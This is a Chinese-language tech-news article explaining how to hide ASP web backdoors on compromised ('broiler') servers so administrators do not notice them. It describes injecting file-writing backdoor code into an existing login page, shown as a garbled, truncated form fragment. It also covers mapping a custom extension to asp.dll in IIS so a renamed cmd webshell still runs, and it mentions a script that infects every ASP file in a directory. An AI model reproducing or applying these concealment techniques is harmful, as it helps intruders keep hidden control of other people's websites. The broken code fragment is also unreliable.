代码详解:ASP后门的放置方法

2014 年 12 月 1 日4800

【赛迪网讯】传在肉鸡上的asp后门,即使你改了代码,躲过了杀毒软件,但是细心的管理员也会发现在他网站web目录下会多出一个asp文件。针对这个问题,我想了两个办法,并没什么技术性可言,只是一个思路而已。

一种是aspInjection(好像这个词真流行呀)。一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。

看一下,用了[url]http://http://www.zjjv.com///<%=server.mappath("xp.asp"")%>>

<textareaname="Message"class=input>

</textarea>

<inputtype="submit"name="Send"value="生成"class=input>

</form>

<%endif%>

值得注意的是这段代码要求服务器支持fso,并且不是在所有的asp文件里都生效的。像被插入的asp文件有包含代码,即有这样的代码,这段代码就不生效了,但不会影响原文件使用。如果你会写asp,你可以将一些asp后门直接写在肉鸡原有的asp文件里。

版主allen写了一个asp文件,一运行会感染所有的asp文件,同目录下每个asp文件都会被插入类似的代码。不知他几时提供下载。:_)

第二,在iis管理器中用asp.dll来解析任意后缀名。像图3,

我把后缀为lcx的文件名用asp.dll来解析。这样,我们把常用的cmd.asp改名为cmd.lcx,然后运行,你看会发生什么?

一样是一个网页后门。当然,起个什么后缀显得更隐蔽,看你的聪明才知智了。

(实习编辑:HJ)

0 0